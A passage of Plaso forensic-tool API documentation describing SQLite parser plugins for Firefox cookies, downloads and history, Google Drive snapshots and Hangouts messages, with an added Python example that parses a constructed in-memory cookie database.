BOOLEAN)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL)', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE 
PRIMARY KEY,value LONGVARCHAR)', 'presentation': 'CREATE TABLE presentation(url_id INTEGER PRIMARY KEY,pres_index INTEGER NOT NULL)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL,pres_index INTEGER DEFAULT -1 NOT NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL)', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'presentation': 'CREATE TABLE presentation(url_id INTEGER PRIMARY KEY,pres_index INTEGER NOT NULL)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL,pres_index INTEGER DEFAULT -1 NOT NULL)', 'urls': 'CREATE TABLE urls(id INTEGER 
PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL)', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'presentation': 'CREATE TABLE presentation(url_id INTEGER PRIMARY KEY,pres_index INTEGER NOT NULL)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL,pres_index INTEGER DEFAULT -1 NOT NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT 
NULL,segment_id INTEGER,is_indexed BOOLEAN,visit_duration INTEGER DEFAULT 0 NOT NULL)'}]
plaso.parsers.sqlite_plugins.firefox_cookies module
SQLite parser plugin for Mozilla Firefox cookies database files.
class plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookieEventData
Bases: plaso.containers.events.EventData
Firefox Cookie event data.
• cookie_name (str) – name field of the cookie.
• data (str) – cookie data.
• httponly (bool) – True if the cookie cannot be accessed through client side script.
• host (str) – hostname of host that set the cookie value.
• path (str) – URI of the page that set the cookie.
• secure (bool) – True if the cookie should only be transmitted over a secure channel.
DATA_TYPE = 'firefox:cookie:entry'
class plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookiePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Mozilla Firefox cookies database files.
DATA_FORMAT = 'Mozilla Firefox cookies SQLite database file'
NAME = 'firefox_cookies'
ParseCookieRow(parser_mediator, query, row, **unused_kwargs)
Parses a cookie row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT id, baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly FROM moz_cookies', 'ParseCookieRow')]
REQUIRED_STRUCTURE = {'moz_cookies': frozenset({'baseDomain', 'creationTime', 'expiry', 'host', 'id', 'isHttpOnly', 'isSecure', 'lastAccessed', 'name', 'path', 'value'})}
SCHEMAS = [{'moz_cookies': 'CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, appId INTEGER DEFAULT 0, inBrowserElement INTEGER DEFAULT 0, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path, appId, inBrowserElement))'}]
URLS = ['https://hg.mozilla.org/mozilla-central/file/349a2f003529/netwerk/cookie/nsCookie.h']
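Added example, not Plaso's own code: it builds an in-memory database from the moz_cookies schema listed in SCHEMAS above, reproduces the REQUIRED_STRUCTURE table-and-column check that every SQLite plugin on this page (Chrome history, Firefox cookies, downloads and history) relies on before running its QUERIES, then runs the documented cookie query and normalises the timestamps. The sample rows, the helper names and the event dict layout are constructed for illustration; the timestamp units (lastAccessed and creationTime as PRTime microseconds, expiry as seconds since the Unix epoch) are Firefox's and are not stated on this page.

```python
"""Added example (not Plaso code): REQUIRED_STRUCTURE check and documented
query for the firefox_cookies plugin, run against a constructed database."""
import sqlite3
from datetime import datetime, timezone

# Schema and query copied from the FirefoxCookiePlugin documentation above.
MOZ_COOKIES_SCHEMA = (
    'CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, '
    'appId INTEGER DEFAULT 0, inBrowserElement INTEGER DEFAULT 0, name TEXT, '
    'value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, '
    'creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, '
    'CONSTRAINT moz_uniqueid UNIQUE (name, host, path, appId, inBrowserElement))')

REQUIRED_STRUCTURE = {'moz_cookies': frozenset({
    'baseDomain', 'creationTime', 'expiry', 'host', 'id', 'isHttpOnly',
    'isSecure', 'lastAccessed', 'name', 'path', 'value'})}

COOKIE_QUERY = (
    'SELECT id, baseDomain, name, value, host, path, expiry, lastAccessed, '
    'creationTime, isSecure, isHttpOnly FROM moz_cookies')

# Constructed sample rows (not real cookies). Firefox stores lastAccessed and
# creationTime as microseconds since the Unix epoch (PRTime) and expiry as
# seconds since the Unix epoch.
SAMPLE_ROWS = [
    (1, 'example.com', 'session', 'abc123', '.example.com', '/',
     1_700_000_000, 1_600_000_000_000_000, 1_599_999_000_000_000, 1, 1),
    (2, 'example.org', 'tracker', 'xyz', 'ads.example.org', '/',
     1_700_000_000, 1_600_000_100_000_000, 1_600_000_000_000_000, 0, 0),
]


def build_database(schema_sql):
    """Creates an in-memory SQLite database from one CREATE TABLE statement."""
    conn = sqlite3.connect(':memory:')
    conn.row_factory = sqlite3.Row
    conn.execute(schema_sql)
    return conn


def build_sample_database():
    """Creates the documented moz_cookies table and loads the sample rows."""
    conn = build_database(MOZ_COOKIES_SCHEMA)
    conn.executemany(
        'INSERT INTO moz_cookies (id, baseDomain, name, value, host, path, '
        'expiry, lastAccessed, creationTime, isSecure, isHttpOnly) '
        'VALUES (?,?,?,?,?,?,?,?,?,?,?)', SAMPLE_ROWS)
    conn.commit()
    return conn


def has_required_structure(conn, required_structure):
    """Returns True if every required table exists with every required column.

    This is what a plugin's REQUIRED_STRUCTURE is for: the plugin only runs
    its QUERIES against a database that carries the tables and columns those
    queries reference, so a renamed or older schema is skipped, not crashed on.
    Table names come from the plugin's own constants, never from the evidence.
    """
    for table, columns in required_structure.items():
        present = {row['name'] for row in conn.execute(
            'PRAGMA table_info("{0:s}")'.format(table))}
        if not present:  # PRAGMA table_info returns no rows for a missing table
            return False
        if not columns.issubset(present):
            return False
    return True


def _prtime_to_iso(microseconds):
    """Converts a PRTime value (microseconds since 1970-01-01 UTC) to ISO 8601."""
    return datetime.fromtimestamp(
        microseconds / 1_000_000, tz=timezone.utc).isoformat()


def parse_cookie_rows(conn):
    """Runs the documented query and returns dicts shaped like the event data."""
    if not has_required_structure(conn, REQUIRED_STRUCTURE):
        return []
    events = []
    for row in conn.execute(COOKIE_QUERY):
        events.append({
            'data_type': 'firefox:cookie:entry',
            'cookie_name': row['name'],
            'data': row['value'],
            'host': row['host'],
            'path': row['path'],
            'secure': bool(row['isSecure']),
            'httponly': bool(row['isHttpOnly']),
            'creation_time': _prtime_to_iso(row['creationTime']),
            'last_accessed_time': _prtime_to_iso(row['lastAccessed']),
            'expiration_time': datetime.fromtimestamp(
                row['expiry'], tz=timezone.utc).isoformat(),
        })
    return events
```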
plaso.parsers.sqlite_plugins.firefox_downloads module
SQLite parser plugin for Mozilla Firefox downloads database files.
class plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadEventData
Bases: plaso.containers.events.EventData
Firefox download event data.
• full_path (str) – full path of the target of the download.
• mime_type (str) – mime type of the download.
• name (str) – name of the download.
• received_bytes (int) – number of bytes received.
• referrer (str) – referrer URL of the download.
• temporary_location (str) – temporary location of the download.
• total_bytes (int) – total number of bytes of the download.
• url (str) – source URL of the download.
DATA_TYPE = 'firefox:downloads:download'
class plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadsPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Mozilla Firefox downloads database files.
The Mozilla Firefox downloads database file is typically stored in: downloads.sqlite
DATA_FORMAT = 'Mozilla Firefox downloads SQLite database (downloads.sqlite) file'
NAME = 'firefox_downloads'
ParseDownloadsRow(parser_mediator, query, row, **unused_kwargs)
Parses a downloads row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT moz_downloads.id, moz_downloads.name, moz_downloads.source, moz_downloads.target, moz_downloads.tempPath, moz_downloads.startTime, moz_downloads.endTime, moz_downloads.state, moz_downloads.referrer, moz_downloads.currBytes, moz_downloads.maxBytes, moz_downloads.mimeType FROM moz_downloads', 'ParseDownloadsRow')]
REQUIRED_STRUCTURE = {'moz_downloads': frozenset({'currBytes', 'endTime', 'id', 'maxBytes', 'mimeType', 'name', 'referrer', 'source', 'startTime', 'state', 'target', 'tempPath'})}
SCHEMAS = [{'moz_downloads': 'CREATE TABLE moz_downloads (id INTEGER PRIMARY KEY, name TEXT, source TEXT, target TEXT, tempPath TEXT, startTime INTEGER, endTime INTEGER, state INTEGER, referrer TEXT, entityID TEXT, currBytes INTEGER NOT NULL DEFAULT 0, maxBytes INTEGER NOT NULL DEFAULT -1, mimeType TEXT, preferredApplication TEXT, preferredAction INTEGER NOT NULL DEFAULT 0, autoResume INTEGER NOT NULL DEFAULT 0)'}]
plaso.parsers.sqlite_plugins.firefox_history module
SQLite parser plugin for Mozilla Firefox history database files.
class plaso.parsers.sqlite_plugins.firefox_history.FirefoxHistoryPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Mozilla Firefox history database files.
The Mozilla Firefox history database file is typically stored in: places.sqlite
DATA_FORMAT = 'Mozilla Firefox history SQLite database (places.sqlite) file'
NAME = 'firefox_history'
ParseBookmarkAnnotationRow(parser_mediator, query, row, **unused_kwargs)
Parses a bookmark annotation row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
ParseBookmarkFolderRow(parser_mediator, query, row, **unused_kwargs)
Parses a bookmark folder row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
ParseBookmarkRow(parser_mediator, query, row, **unused_kwargs)
Parses a bookmark row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
ParsePageVisitedRow(parser_mediator, query, row, cache=None, database=None, **unused_kwargs)
Parses a page visited row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
• cache (Optional[SQLiteCache]) – cache.
• database (Optional[SQLiteDatabase]) – database.
QUERIES = [('SELECT moz_historyvisits.id, moz_places.url, moz_places.title, moz_places.visit_count, moz_historyvisits.visit_date, moz_historyvisits.from_visit, moz_places.rev_host, moz_places.hidden, moz_places.typed, moz_historyvisits.visit_type FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id', 'ParsePageVisitedRow'), ('SELECT moz_bookmarks.type, moz_bookmarks.title AS bookmark_title, moz_bookmarks.dateAdded, moz_bookmarks.lastModified, moz_places.url, moz_places.title AS places_title, moz_places.rev_host, moz_places.visit_count, moz_bookmarks.id FROM moz_places, moz_bookmarks WHERE moz_bookmarks.fk = moz_places.id AND moz_bookmarks.type <> 3', 'ParseBookmarkRow'), ('SELECT moz_items_annos.content, moz_items_annos.dateAdded, moz_items_annos.lastModified, moz_bookmarks.title, moz_places.url, moz_places.rev_host, moz_items_annos.id FROM moz_items_annos, moz_bookmarks, moz_places WHERE moz_items_annos.item_id = moz_bookmarks.id AND moz_bookmarks.fk = moz_places.id', 'ParseBookmarkAnnotationRow'), ('SELECT moz_bookmarks.id, moz_bookmarks.title,moz_bookmarks.dateAdded, moz_bookmarks.lastModified FROM moz_bookmarks WHERE moz_bookmarks.type = 2', 'ParseBookmarkFolderRow')]
REQUIRED_STRUCTURE = {'moz_bookmarks': frozenset({'dateAdded', 'fk', 'id', 'lastModified', 'title', 'type'}), 'moz_historyvisits': frozenset({'from_visit', 'id', 'place_id', 'visit_date', 'visit_type'}), 'moz_items_annos': frozenset({'content', 'dateAdded', 'id', 'item_id', 'lastModified'}), 'moz_places': frozenset({'hidden', 'id', 'rev_host', 'title', 'typed', 'url', 'visit_count'})}
SCHEMAS = [{'moz_anno_attributes': 'CREATE TABLE moz_anno_attributes ( id INTEGER PRIMARY KEY, name VARCHAR(32) UNIQUE NOT NULL)', 'moz_annos': 'CREATE TABLE moz_annos ( id INTEGER PRIMARY KEY, place_id INTEGER NOT NULL, anno_attribute_id INTEGER, mime_type VARCHAR(32) DEFAULT NULL, content LONGVARCHAR, flags INTEGER DEFAULT 0, expiration INTEGER DEFAULT 0, type INTEGER DEFAULT 0, dateAdded INTEGER DEFAULT 0, lastModified INTEGER DEFAULT 0)', 'moz_bookmarks': 'CREATE TABLE moz_bookmarks ( id INTEGER PRIMARY KEY, type INTEGER, fk INTEGER DEFAULT NULL, parent INTEGER, position INTEGER, title LONGVARCHAR, keyword_id INTEGER, folder_type TEXT, dateAdded INTEGER, lastModified INTEGER)', 'moz_bookmarks_roots': 'CREATE TABLE moz_bookmarks_roots ( root_name VARCHAR(16) UNIQUE, folder_id INTEGER)', 'moz_favicons': 'CREATE TABLE moz_favicons ( id INTEGER PRIMARY KEY, url LONGVARCHAR UNIQUE, data BLOB, mime_type VARCHAR(32), expiration LONG)', 'moz_historyvisits': 'CREATE TABLE moz_historyvisits ( id INTEGER PRIMARY KEY, from_visit INTEGER, place_id INTEGER, visit_date INTEGER, visit_type INTEGER, session INTEGER)', 'moz_inputhistory': 'CREATE TABLE moz_inputhistory ( place_id INTEGER NOT NULL, input LONGVARCHAR NOT NULL, use_count INTEGER, PRIMARY KEY (place_id, input))', 'moz_items_annos': 'CREATE TABLE moz_items_annos ( id INTEGER PRIMARY KEY, item_id INTEGER NOT NULL, anno_attribute_id INTEGER, mime_type VARCHAR(32) DEFAULT NULL, content LONGVARCHAR, flags INTEGER DEFAULT 0, expiration INTEGER DEFAULT 0, type INTEGER DEFAULT 0, dateAdded INTEGER DEFAULT 0, lastModified INTEGER DEFAULT 0)', 'moz_keywords': 'CREATE TABLE moz_keywords ( id INTEGER PRIMARY KEY AUTOINCREMENT, keyword TEXT UNIQUE)', 'moz_places': 'CREATE TABLE moz_places ( id INTEGER PRIMARY KEY, url LONGVARCHAR, title LONGVARCHAR, rev_host LONGVARCHAR, visit_count INTEGER DEFAULT 0, hidden INTEGER DEFAULT 0 NOT NULL, typed INTEGER DEFAULT 0 NOT NULL, favicon_id INTEGER, frecency INTEGER DEFAULT -1 NOT NULL, 
last_visit_date INTEGER )'}, {'moz_anno_attributes': 'CREATE TABLE moz_anno_attributes ( id INTEGER PRIMARY KEY, name VARCHAR(32) UNIQUE NOT NULL)', 'moz_annos': 'CREATE TABLE moz_annos ( id INTEGER PRIMARY KEY, place_id INTEGER NOT NULL, anno_attribute_id INTEGER, mime_type VARCHAR(32) DEFAULT NULL, content LONGVARCHAR, flags INTEGER DEFAULT 0, expiration INTEGER DEFAULT 0, type INTEGER DEFAULT 0, dateAdded INTEGER DEFAULT 0, lastModified INTEGER DEFAULT 0)', 'moz_bookmarks': 'CREATE TABLE moz_bookmarks ( id INTEGER PRIMARY KEY, type INTEGER, fk INTEGER DEFAULT NULL, parent INTEGER, position INTEGER, title LONGVARCHAR, keyword_id INTEGER, folder_type TEXT, dateAdded INTEGER, lastModified INTEGER, guid TEXT)', 'moz_bookmarks_roots': 'CREATE TABLE moz_bookmarks_roots ( root_name VARCHAR(16) UNIQUE, folder_id INTEGER)', 'moz_favicons': 'CREATE TABLE moz_favicons ( id INTEGER PRIMARY KEY, url LONGVARCHAR UNIQUE, data BLOB, mime_type VARCHAR(32), expiration LONG, guid TEXT)', 'moz_historyvisits': 'CREATE TABLE moz_historyvisits ( id INTEGER PRIMARY KEY, from_visit INTEGER, place_id INTEGER, visit_date INTEGER, visit_type INTEGER, session INTEGER)', 'moz_hosts': 'CREATE TABLE moz_hosts ( id INTEGER PRIMARY KEY, host TEXT NOT NULL UNIQUE, frecency INTEGER, typed INTEGER NOT NULL DEFAULT 0, prefix TEXT)', 'moz_inputhistory': 'CREATE TABLE moz_inputhistory ( place_id INTEGER NOT NULL, input LONGVARCHAR NOT NULL, use_count INTEGER, PRIMARY KEY (place_id, input))', 'moz_items_annos': 'CREATE TABLE moz_items_annos ( id INTEGER PRIMARY KEY, item_id INTEGER NOT NULL, anno_attribute_id INTEGER, mime_type VARCHAR(32) DEFAULT NULL, content LONGVARCHAR, flags INTEGER DEFAULT 0, expiration INTEGER DEFAULT 0, type INTEGER DEFAULT 0, dateAdded INTEGER DEFAULT 0, lastModified INTEGER DEFAULT 0)', 'moz_keywords': 'CREATE TABLE moz_keywords ( id INTEGER PRIMARY KEY AUTOINCREMENT, keyword TEXT UNIQUE)', 'moz_places': 'CREATE TABLE moz_places ( id INTEGER PRIMARY KEY, url LONGVARCHAR, 
title LONGVARCHAR, rev_host LONGVARCHAR, visit_count INTEGER DEFAULT 0, hidden INTEGER DEFAULT 0 NOT NULL, typed INTEGER DEFAULT 0 NOT NULL, favicon_id INTEGER, frecency INTEGER DEFAULT -1 NOT NULL, last_visit_date INTEGER , guid TEXT)', 'sqlite_stat1': 'CREATE TABLE sqlite_stat1(tbl, idx, stat)'}]
URL_CACHE_QUERY = 'SELECT h.id AS id, p.url, p.rev_host FROM moz_places p, moz_historyvisits h WHERE p.id = h.place_id'
class plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkAnnotationEventData
Bases: plaso.containers.events.EventData
Firefox bookmark annotation event data.
content – annotation content.
Type str
title – title of the bookmark folder.
Type str
url – bookmarked URL.
Type str
DATA_TYPE = 'firefox:places:bookmark_annotation'
class plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkEventData
Bases: plaso.containers.events.EventData
Firefox bookmark event data.
host – visited hostname.
Type str
places_title – places title.
Type str
title – title of the bookmark folder.
Type str
type – bookmark type.
Type int
url – bookmarked URL.
Type str
visit_count – visit count.
Type int
DATA_TYPE = 'firefox:places:bookmark'
class plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkFolderEventData
Bases: plaso.containers.events.EventData
Firefox bookmark folder event data.
title – title of the bookmark folder.
Type str
DATA_TYPE = 'firefox:places:bookmark_folder'
class plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesPageVisitedEventData
Bases: plaso.containers.events.EventData
Firefox page visited event data.
extra – extra event data.
Type list[object]
host – visited hostname.
Type str
title – title of the visited page.
Type str
url – URL of the visited page.
Type str
visit_count – visit count.
Type int
visit_type – transition type for the event.
Type str
DATA_TYPE = 'firefox:places:page_visited'
plaso.parsers.sqlite_plugins.gdrive module
SQLite parser plugin for Google Drive snapshot database files.
class plaso.parsers.sqlite_plugins.gdrive.GoogleDrivePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Google Drive snapshot database files.
The Google Drive snapshot database file is typically stored in: snapshot.db
CLOUD_PATH_CACHE_QUERY = 'SELECT cloud_entry.filename, cloud_entry.resource_id, cloud_relations.parent_resource_id AS parent FROM cloud_entry, cloud_relations WHERE cloud_entry.doc_type = 0 AND cloud_entry.resource_id = cloud_relations.child_resource_id'
DATA_FORMAT = 'Google Drive snapshot SQLite database (snapshot.db) file'
GetCloudPath(resource_id, cache, database)
Return cloud path given a resource id.
Parameters
• resource_id (str) – resource identifier for the file.
• cache (SQLiteCache) – cache.
• database (SQLiteDatabase) – database.
Returns full path to the resource value.
Return type str
GetLocalPath(inode, cache, database)
Return local path for a given inode.
Parameters
• inode (int) – inode number for the file.
• cache (SQLiteCache) – cache.
• database (SQLiteDatabase) – database.
Returns full path, including the filename of the given inode value.
Return type str
LOCAL_PATH_CACHE_QUERY = 'SELECT local_relations.child_inode_number, local_relations.parent_inode_number, local_entry.filename FROM local_relations, local_entry WHERE local_relations.child_inode_number = local_entry.inode_number'
NAME = 'google_drive'
ParseCloudEntryRow(parser_mediator, query, row, cache=None, database=None, **unused_kwargs)
Parses a cloud entry row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
• cache (SQLiteCache) – cache.
• database (SQLiteDatabase) – database.
ParseLocalEntryRow(parser_mediator, query, row, cache=None, database=None, **unused_kwargs)
Parses a local entry row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
• cache (Optional[SQLiteCache]) – cache.
• database (Optional[SQLiteDatabase]) – database.
QUERIES = [('SELECT cloud_entry.resource_id, cloud_entry.filename, cloud_entry.modified, cloud_entry.created, cloud_entry.size, cloud_entry.doc_type, cloud_entry.shared, cloud_entry.checksum, cloud_entry.url, cloud_relations.parent_resource_id FROM cloud_entry, cloud_relations WHERE cloud_relations.child_resource_id = cloud_entry.resource_id AND cloud_entry.modified IS NOT NULL;', 'ParseCloudEntryRow'), ('SELECT inode_number, filename, modified, checksum, size FROM local_entry WHERE modified IS NOT NULL;', 'ParseLocalEntryRow')]
REQUIRED_STRUCTURE = {'cloud_entry': frozenset({'checksum', 'created', 'doc_type', 'filename', 'modified', 'resource_id', 'shared', 'size', 'url'}), 'cloud_relations': frozenset({'child_resource_id', 'parent', 'parent_resource_id'}), 'local_entry': frozenset({'checksum', 'filename', 'inode_number', 'modified', 'size'}), 'local_relations': frozenset({'child_inode_number', 'parent_inode_number'})}
SCHEMAS = [{'cloud_entry': 'CREATE TABLE cloud_entry (resource_id TEXT, filename TEXT, modified INTEGER, created INTEGER, acl_role INTEGER, doc_type INTEGER, removed INTEGER, url TEXT, size INTEGER, checksum TEXT, shared INTEGER, PRIMARY KEY (resource_id))', 'cloud_relations': 'CREATE TABLE cloud_relations (child_resource_id TEXT, parent_resource_id TEXT, UNIQUE (child_resource_id, parent_resource_id), FOREIGN KEY (child_resource_id) REFERENCES cloud_entry(resource_id), FOREIGN KEY (parent_resource_id) REFERENCES cloud_entry(resource_id))', 'local_entry': 'CREATE TABLE local_entry (inode_number INTEGER, filename TEXT, modified INTEGER, checksum TEXT, size INTEGER, PRIMARY KEY (inode_number))', 'local_relations': 'CREATE TABLE local_relations (child_inode_number INTEGER, parent_inode_number INTEGER, UNIQUE (child_inode_number), FOREIGN KEY (parent_inode_number) REFERENCES local_entry(inode_number), FOREIGN KEY (child_inode_number) REFERENCES local_entry(inode_number))', 'mapping': 'CREATE TABLE mapping (inode_number INTEGER, resource_id TEXT, UNIQUE (inode_number), FOREIGN KEY (inode_number) REFERENCES local_entry(inode_number), FOREIGN KEY (resource_id) REFERENCES cloud_entry(resource_id))', 'overlay_status': 'CREATE TABLE overlay_status (path TEXT, overlay_status INTEGER, PRIMARY KEY (path))'}]
class plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotCloudEntryEventData
Bases: plaso.containers.events.EventData
Google Drive snapshot cloud entry event data.
doc_type – document type.
Type int
path – path of the file.
Type str
shared – True if the file is shared, False if the file is private.
Type bool
size – size of the file.
Type int
url – URL of the file.
Type str
DATA_TYPE = 'gdrive:snapshot:cloud_entry'
class plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotLocalEntryEventData
Bases: plaso.containers.events.EventData
Google Drive snapshot local entry event data.
path – path of the file.
Type str
size – size of the file.
Type int
DATA_TYPE = 'gdrive:snapshot:local_entry'
plaso.parsers.sqlite_plugins.hangouts_messages module
SQLite parser plugin for Google Hangouts conversations database files.
class plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessageData
Bases: plaso.containers.events.EventData
Google Hangouts message event data.
body – content of the SMS text message.
Type str
message_status – message status.
Type int
message_type – message type.
Type int
sender – name of the sender.
Type str
DATA_TYPE = 'android:messaging:hangouts'
class plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessagePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Google Hangouts conversations database files.
The Google Hangouts conversations database file is typically stored in: /data/com.google.android.talk/databases/babel.db
This SQLite database is the conversation database for conversations, participant names, messages, and information about the Google Hangout event. There can be multiple babel.db databases, and each database name will be followed by an integer starting with 0, for example: "babel0.db", "babel1.db", "babel3.db".
DATA_FORMAT = 'Google Hangouts conversations SQLite database (babel.db) file'
NAME = 'hangouts_messages'
ParseMessagesRow(parser_mediator, query, row, **unused_kwargs)
Parses a messages row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT messages._id, participants.full_name, text, messages.timestamp,status, type FROM messages INNER JOIN participants ON messages.author_chat_id=participants.chat_id;', 'ParseMessagesRow')]
REQUIRED_STRUCTURE = {'blocked_people': frozenset({}), 'messages': frozenset({'_id', 'author_chat_id', 'status', 'text', 'timestamp', 'type'}), 'participants': frozenset({'chat_id', 'full_name'})}
